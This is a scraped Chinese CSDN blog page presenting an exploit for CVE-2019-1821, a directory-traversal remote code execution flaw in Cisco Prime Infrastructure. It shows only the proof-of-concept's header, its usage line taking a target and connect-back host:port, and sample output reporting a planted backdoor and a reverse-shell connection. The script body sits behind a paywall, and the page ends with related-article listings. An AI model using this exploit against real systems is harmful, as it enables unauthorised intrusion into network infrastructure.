[EXP]CVE-2019-1821 Cisco Prime Infrastructure思科未授权远程代码执行漏洞

最新推荐文章于 2023-02-17 21:55:02 发布
最新推荐文章于 2023-02-17 21:55:02 发布
阅读量818 收藏
点赞数
分类专栏: 工具 源码 文章标签: 工具 思科 Exploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/k8gege/article/details/90742503
版权
本文详细介绍了CVE-2019-1821,这是一个针对Cisco Prime Infrastructure的未授权远程代码执行漏洞。通过Health Monitor HA TarArchive Directory Traversal,攻击者可以构建恶意tar文件并上传到系统,实现远程代码执行。文章提供了一个exploit示例,展示了如何利用此漏洞植入回门并获取shell权限。
摘要由CSDN通过智能技术生成

CVE-2019-1821 Cisco Prime Infrastructure Remote Code Execution
https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html

Cscan思科扫描插件 (IP/Port/HostName/Boot/Version)
https://www.cnblogs.com/k8gege/p/10679491.html

CVE-2019-1821 Exploit

#!/usr/bin/python

“”"
Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability
Steven Seeley (mr_me) of Source Incite - 2019
SRC: SRC-2019-0034
CVE: CVE-2019-1821

Example:

saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py <target> <connectback:port>
(+) eg: ./poc.py 192.168.100.123 192.168.100.2:4444

saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.2:4444
(+) planted backdoor!
(+) starting handler on port 4444
(+) connection from 192

最低0.47元/天 解锁文章
k8gege
关注
专栏目录
Cisco Prime infrastructure(PI) 3.4_(二)_设置园区和无线热图
长颈鹿照相馆
08-23 3260
Topic:   Site MAP   Interface monitor policy   CLI Template   SIte MAP 站点地图由campus,building,floor,outdoor四个元素组成,按需创建这些元素,构成一个完整的Site MAP。 因为我们生活在中国,第一件事是先把度量单位从英尺改成米(需要root权限)。 操作路径:Maps / Wire...
Cisco Prime infrastructure(PI) 3.4_(一)_基础配置
长颈鹿照相馆
08-23 5726
Topic:    Vitrual Domain &amp; User Group   How Pi Community with Network Device   what configuration before netwrok device join in PI   what configuration before PI ADD netwrok device   Put the ...
cve-2019-1821 思科 Cisco Prime 企业局域网管理器 远程代码执行 漏洞分析
whatday的专栏
08-25 921
前言 不是所有目录遍历漏洞危害都相同,取决于遍历的用法以及用户交互程度。正如你将看到,本文的这个漏洞类在代码中非常难发现,但可以造成巨大的影响。 这个漏洞存在于思科Prime Infrastructure项目,思科为其申请编号:CVE-2019-1821。因为我无法测试新补丁(我没有思科的证件),不清楚漏洞补丁的具体情况,因此我决定分享漏洞详情,希望有人可以验证补丁的稳定性。 TL;DR 在这篇文章我会讨论CVE-2019-1821的挖掘过程并演示攻击,该漏洞属于经身份验证的服务器端远程代码执行漏洞
Cisco Prime Infrastructure 3.1 User Guide
最新发布
csyaoyufeng的博客
02-17 240
Cisco Prime Infrastructure 3.x Data Sheet
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-2019-11708诱骗父流程浏览到任意URL。 在过去的中,我已经介绍了CVE-2019-9810的根本原因和利用文章以及相关的。 CVE-2019-11708已由公告,并...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
Cisco Prime Infrastructure配置手册
10-16
Cisco Prime Infrastructure用户配置手册
Cisco Prime Infrastructure_3_7_0_User_Guide
01-15
Cisco Prime Infrastructure 3.7 用户配置手册。 Cisco PI的设计理念是遵循IT管理流程(Lifecycle),设计出如图一契合IT管理程序的解决方案,Lifecycle依照Design(设计)、Fulfill(满足)、Assure(确认)、Analyze(分析)及Optimization(优化)的循环流程。
Cisco WebEx Meetings Windows 应用本地提权漏洞poc(CVE-2019-1674)
03-01
Cisco WebEx Meetings Windows 应用本地提权漏洞(CVE-2019-1674) 的poc,里面的poc可以一键对漏洞程序进行验证
Cisco Prime Infrastructure 3.0 + Network Analysis Module 6.1
weixin_34128501的博客
11-01 270
cisco NAMhttp://www.cisco.com/c/en/us/products/collateral/interfaces-modules/services-modules/white_paper_c07-505273.htmlhttp://www.cisco.com/c/en/us/td/docs/net_mgmt/network_analysis_mod...
web渗透--proftpd测试
朝阳似锦 晖映山河
09-10 391
proftpd介绍 ProFTPD:是一个Unix平台或类Unix平台上的FTP服务器程序。 http://www.proftpd.org 探测目标proftpd nmap -sV 目标IP地址 -p 2121 探测出目标的proftpd版本信息 exploit-db搜索目标漏洞 在https://www.exploit-db.com/ 输入对应软件及版本信息搜索是否有漏洞 searchsploit 软件及版本号 暴力破解 使用metasploit msfcosole use auxiliar
修复CVE-2019-3862漏洞
发现美的眼睛
05-11 2670
修复CVE-2019-3862漏洞 这个漏洞来自于libssh2中的,发现者是国外团队,在发现之初就已经提交上去。在公布漏洞时,该漏洞已经被修复,修复方式采用更新。 修复时,博客主查看了一下阿里云安全中心的修复方案和网上其它博客主的修复方案,都是使用yum对curl的更新。 # 如果yum update要使用的话,请注意linux内核也有可能会被更新 yum update # 更新curl命令,这篇博客文章发布时,修复漏洞的新版本是7.29.0 yum update curl # 查看一下当前
windows服务器漏洞修复,三种修复Windows远程桌面服务漏洞CVE-2019-0708)的方法
weixin_42361764的博客
08-11 7293
重要提示:该漏洞影响旧版本的Windows系统,包括:Windows7、Windows Server2008 R2、Windows Server2008、Windows 2003、WindowsXP。备注:Windows 8和Windows 10及之后版本不受此漏洞影响,勿须担心这个问题。前期准备工作:在对终端和服务器进行补丁修复之前,需要对重要资料进行备份。回退措施:终端和服务器进行补丁修复后,...
CVE-2019-11477漏洞详解详玩
Netfilter
08-20 8931
几天前,为了备注,2019年的6月17号吧,一个Linux/FreeBSD系统的漏洞爆出,就是CVE-2019-11477,Netflix的公告为: https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md Redhat的链接为: https://access.redha...
CVE-2019-19781 Citrix漏洞远程代码执行详解与检测
"本文将深入探讨CVE-2019-19781漏洞,该漏洞影响了Citrix Application Delivery Controller(ADC)和Citrix Gateway,可能导致远程代码执行(RCE)。我们将分析漏洞的成因、检测方法以及利用示例,帮助读者了解其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值